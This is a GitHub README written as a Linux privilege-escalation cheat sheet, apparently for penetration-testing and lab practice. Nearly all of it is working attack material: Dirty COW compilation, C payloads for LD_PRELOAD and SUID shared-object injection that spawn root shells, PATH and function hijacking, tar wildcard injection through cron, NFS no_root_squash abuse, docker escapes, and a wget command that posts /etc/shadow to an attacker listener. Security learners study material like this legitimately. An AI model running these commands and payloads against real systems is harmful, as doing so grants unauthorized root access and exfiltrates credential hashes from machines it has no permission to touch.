Skip to content

Latest commit

 

History

History
451 lines (315 loc) · 7.82 KB

README.md

File metadata and controls

451 lines (315 loc) · 7.82 KB

Escalation Paths

  1. Kernel Exploits
  2. Stored Passwords
  3. File Permissions
  4. Sudo
  5. SUID
  6. Capabilities
  7. Scheduled Tasks
  8. NFS Root Squashing
  9. Docker

Kernel Exploits

uname -a
#Google or searchsploit the version
#get exploit code

#we can also use linux-exploit-suggester
./linux-exploit-suggester.sh

#dirty cow exploit
gcc -pthread c0w.c -o cow
#creates executable for exploit

./cow
#privesc

passwd
#elevates user to root

Stored Passwords

history

ls -la

cat .bash_history
#check for passwords

su root
#use root password

#for stored passwords
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
#check for passwords in current dir

#check using automated tools such as linpeas.sh

File Permissions

ls -la /etc/passwd

ls -la /etc/shadow
#if we have read access, we can use that

cat /etc/passwd

cat /etc/shadow
#copy both file contents to attacker machine

unshadow passwd shadow
#copy output of required users and their hashes
#we can use this with hashcat or john
#identify hash type with hashcat wiki

su root
#switch to user with password
#hunting for ssh keys
find / -name authorized_keys 2>/dev/null

find / -name id_rsa 2>/dev/null
#private keys

ls -la id_rsa
#attempt to use private key

chmod 600 id_rsa

ssh [email protected] -i id_rsa
#we can check into other users' .ssh folder

Sudo

#sudo shell escaping

sudo -l
#we can run vim as sudo
#get exploit from GTFObins

sudo vim -c ':!/bin/sh'
#gives root shell
#intended functionality

sudo -l
#we can run apache2 as root
#but we do not have exploit in GTFObins

sudo apache2 -f /etc/shadow
#we can view root hash

sudo wget --post=file=/etc/shadow 10.10.14.12:8081
#we get root hash on our listener at port 8081
#LD_PRELOAD

sudo -l
#env var linked to LD_PRELOAD
#we can load our malicious libraries before other libraries

vim shell.c
#add exploit code

gcc -fPIC -shared shell.c -o shell.so -nostartfiles
#fPIC is for position independent code

ls
#shell.so is created

sudo LD_PRELOAD=/home/user/shell.so less
#use full path for .so file
#run with program that can be run as sudo, in this case - less
#this gives us root shell
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
#CVE-2019-14287
#for !root sudo permissions

sudo -l

sudo -u#-1 /bin/bash
#we get root shell
#CVE-2019-18634

cat /etc/sudoers
#if pwfeedback option is set (asterisks for password)
#and sudo version < 1.8.26
#this exploit is possible

#get exploit from Google
#compile and run it to get root

SUID

#suid allows to execute file with permissions of specified user

find / -perm -u=s -type f 2>/dev/null
#find files with suid bit set
#get exploit from GTFObins
#run and get root
#shared object injection

#find files with suid bit set
#check permissions
ls -la /usr/local/bin/suid-so

#run program
/usr/local/bin/suid-so

strace /usr/local/bin/suid-so 2>&1
#attempt to debug

strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
#browse through the .so files used for program
#this mentions /home/user/.config/libcalc.so, we can check that

ls -la /home/user/.config/libcalc.so
#no such file or directory

ls -la /home/user
#.config folder does not exist

#we can inject malicious .so file here

vim libcalc.c
#add exploit code

mkdir .config

gcc -shared -fPIC /home/user/libcalc.c -o /home/user/.config/libcalc.so

/usr/local/bin/suid-so
#running this gives us root
#as we injected the so file
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
#binary symlinks

#CVE-2016-1247

dpkg -l | grep nginx
#vulnerable if version < 1.6.2
#and sudo has SUID bit

find / -type f -perm -04000 -ls 2>/dev/null
#find files with suid bit set
#SUID bit set on sudo

ls -la /var/log/nginx
#we have rwx privileges in directory

#get exploit for CVE-2016-1247
./nginxed-root.sh /var/log/nginx/error.log
#the exploit does everything for us
#it will generate root shell when nginx is restarted
#or if root user runs this command
invoke-rc.d nginx rotate >/dev/null 2>&1

#we get root shell
#env variables

env
#view all env variables

echo $PATH
#view path variable

find / -type f -perm -04000 -ls 2>/dev/null
#find files with SUID bit set

#check a vulnerable binary
ls -la /usr/local/bin/suid-env

/usr/local/bin/suid-env

strings /usr/local/bin/suid-env
#check for any other programs or binaries being referred
#this program runs 'service apache2 start'

#we can manipulate env variable

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c

cat /tmp/service.c

gcc /tmp/service.c -o /tmp/service

export PATH=/tmp:$PATH

echo $PATH
#now, /tmp will be checked first for 'service' binary, before other directories

/usr/local/bin/suid-env
#run and get root
#env variables
ls -la /usr/local/bin/suid-env2
#another binary with SUID bit set

/usr/local/bin/suid-env2

strings /usr/local/bin/suid-env2
#this refers to a direct path
#'/usr/sbin/service apache2 start'
#unlike the previous binary

#create malicious function
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

#export the function
export -f /usr/sbin/service

#run binary and get root
/usr/sbin/service

Capabilities

getcap -r / 2>/dev/null
#get capabilities
#/usr/bin/python2.6 = cap_setuid+ep

#get exploit from GTFObins
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
#running this gives root

Scheduled Tasks

#cron paths

cat /etc/crontab
#view cronjobs
#check PATH variable
#check the directories for files of cronjobs

ls -la /home/user
#does not contain overwrite.sh
#so we can create it

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh

chmod +x /home/user/overwrite.sh
#wait for a minute for cronjob to run

/tmp/bash -p
#we are root now
#cron wildcards

cat /etc/crontab
#this runs a script every minute

cat /usr/local/bin/compress.sh
#this runs a tar command which uses wildcards
#we can exploit the tar wildcard cronjob

ls -la /usr/local/bin/compress.sh
#we cannot modify the script

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh

chmod +x runme.sh

#get exploit from Google
touch /home/user/--checkpoint=1

touch /home/user/--checkpoint-action=exec=sh\runme.sh
#wildcard injection
#wait for a minute

/tmp/bash -p
#we get root
#cron file overwrites

cat /etc/crontab
#mentions overwrite.sh

locate overwrite.sh

ls -la /usr/local/bin/overwrite.sh
#we have write permissions

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh

#wait a minute
ls -la /tmp
#cronjob runs

/tmp/bash -p
#we get root

NFS Root Squashing

cat /etc/exports
#includes option 'no_root_squash'
#this means that folder can be mounted

#in attacker machine
showmount -e 10.10.13.14
#check export list for victim machine
#shows /tmp

mkdir /tmp/mountme

mount -o rw,vers=2 10.10.13.14:/tmp /tmp/mountme

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mountme/x.c

cat /tmp/mountme/x.c

gcc /tmp/mountme/x.c -o /tmp/mountme/x

chmod +s /tmp/mountme/x

#in victim machine
cd /tmp

./x
#we are root now

Docker

id
#we are a part of docker group

#get exploit from GTFObins

docker images
#check images

docker run -v /:/mnt --rm -it bash chroot /mnt sh
#this gives us root shell